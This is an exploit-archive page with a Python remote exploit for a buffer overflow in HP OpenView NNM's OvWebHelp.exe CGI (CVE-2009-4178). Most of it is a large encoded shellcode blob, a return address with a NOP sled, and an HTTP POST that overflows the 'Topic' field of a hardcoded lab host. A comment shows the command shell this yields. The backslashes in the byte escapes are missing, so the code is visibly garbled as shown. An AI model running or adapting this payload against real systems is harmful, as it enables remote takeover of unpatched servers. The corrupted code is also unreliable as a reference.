HP OpenView NNM OvWebHelp.exe CGI Topic overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : HP OpenView NNM OvWebHelp.exe CGI Topic overflow
# Published : 2010-03-30
# Author : S2 Crew
# Previous Title : CompleteFTP Server Directory Traversal
# Next Title : SAP MaxDB Malformed Handshake Request Remote Code Execution
#!/usr/bin/python

# Exploit title: HP OpenView NNM OvWebHelp.exe CGI Topic overflow
# Date: 2010.03.30
# Software link: hp.com<http://hp.com>
# Version: 7.53
# Tested on: Windows 2003 SP2
# CVE: 2009-4178
# Code:
############################################
# Trying 172.16.29.130...
# Connected to 172.16.29.130.
# Escape character is '^]'.
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:Program FilesHP OpenViewwwwcgi-bin>
############################################

import struct
import socket
import httplib
import urllib

#[*] x86/alpha_mixed succeeded with size 746 (iteration=1)
sc =(
"x89xe3xd9xc3xd9x73xf4x5dx55x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx49x78x4ex69x45x50x45x50x43x30x45x30x4e"
"x69x48x65x44x71x4bx62x45x34x4ex6bx51x42x44x70"
"x4cx4bx43x62x44x4cx4ex6bx50x52x44x54x4ex6bx43"
"x42x45x78x44x4fx4ex57x50x4ax45x76x50x31x4bx4f"
"x46x51x49x50x4cx6cx45x6cx43x51x43x4cx45x52x46"
"x4cx47x50x4fx31x48x4fx44x4dx43x31x49x57x4bx52"
"x48x70x51x42x43x67x4cx4bx50x52x46x70x4ex6bx47"
"x32x45x6cx47x71x48x50x4cx4bx47x30x44x38x4fx75"
"x49x50x50x74x51x5ax43x31x4ax70x42x70x4cx4bx43"
"x78x46x78x4ex6bx43x68x45x70x47x71x48x53x4ax43"
"x45x6cx47x39x4cx4bx47x44x4cx4bx47x71x4ax76x44"
"x71x4bx4fx45x61x49x50x4cx6cx4bx71x4ax6fx44x4d"
"x45x51x4ax67x47x48x4bx50x43x45x4bx44x46x63x51"
"x6dx49x68x45x6bx51x6dx46x44x43x45x4dx32x46x38"
"x4ex6bx42x78x44x64x45x51x49x43x45x36x4cx4bx44"
"x4cx50x4bx4ex6bx50x58x47x6cx45x51x49x43x4ex6b"
"x46x64x4ex6bx47x71x4ex30x4fx79x50x44x46x44x51"
"x34x43x6bx43x6bx43x51x51x49x42x7ax46x31x49x6f"
"x4bx50x50x58x43x6fx50x5ax4cx4bx44x52x48x6bx4b"
"x36x51x4dx51x78x45x63x46x52x43x30x43x30x43x58"
"x42x57x42x53x46x52x51x4fx50x54x51x78x42x6cx50"
"x77x47x56x47x77x4bx4fx4bx65x4cx78x4ax30x47x71"
"x47x70x43x30x51x39x49x54x51x44x50x50x45x38x46"
"x49x4dx50x50x6bx43x30x49x6fx49x45x50x50x42x70"
"x50x50x42x70x43x70x50x50x47x30x50x50x51x78x49"
"x7ax44x4fx49x4fx4bx50x4bx4fx4bx65x4ex69x4fx37"
"x50x31x49x4bx51x43x45x38x44x42x47x70x47x61x51"
"x4cx4ex69x4bx56x43x5ax46x70x42x76x51x47x50x68"
"x4bx72x49x4bx44x77x43x57x4bx4fx49x45x50x53x43"
"x67x45x38x48x37x49x79x44x78x49x6fx4bx4fx4ex35"
"x51x43x51x43x51x47x45x38x50x74x48x6cx47x4bx49"
"x71x49x6fx4ax75x42x77x4dx59x48x47x51x78x44x35"
"x42x4ex42x6dx50x61x49x6fx49x45x50x68x42x43x42"
"x4dx51x74x43x30x4dx59x49x73x50x57x46x37x43x67"
"x50x31x48x76x42x4ax45x42x46x39x46x36x4dx32x49"
"x6dx42x46x48x47x43x74x46x44x47x4cx47x71x43x31"
"x4ex6dx43x74x51x34x46x70x4fx36x43x30x42x64x46"
"x34x42x70x50x56x50x56x43x66x42x66x51x46x50x4e"
"x46x36x43x66x46x33x43x66x51x78x44x39x48x4cx47"
"x4fx4cx46x4bx4fx4bx65x4ex69x4dx30x42x6ex50x56"
"x43x76x49x6fx46x50x43x58x44x48x4dx57x47x6dx51"
"x70x49x6fx4ax75x4dx6bx4cx30x4cx75x4fx52x43x66"
"x42x48x4dx76x4fx65x4dx6dx4fx6dx49x6fx48x55x47"
"x4cx47x76x43x4cx45x5ax4bx30x4bx4bx4dx30x44x35"
"x43x35x4fx4bx51x57x42x33x51x62x50x6fx43x5ax45"
"x50x42x73x49x6fx4ax75x46x6ax41x41")

data="A"*57
data2 = "B"*5000
ret = "xDFxf2xe5x77" + "x90" * 254 + sc # call esp kernel32.dll
payload = data + ret

p = urllib.urlencode({'Topic':payload,'Target':data2})
h = {"Content-Type": "application/x-www-form-urlencoded","Accept": "text/html","User-Agent": "BackTrack", "Accept-Language": "en"}

c = httplib.HTTPConnection('172.16.29.130')
c.request("POST","/OvCgi/OvWebHelp.exe",p,h)
r = c.getresponse()

print r.status, r.reason
c.close()

print "nDonen"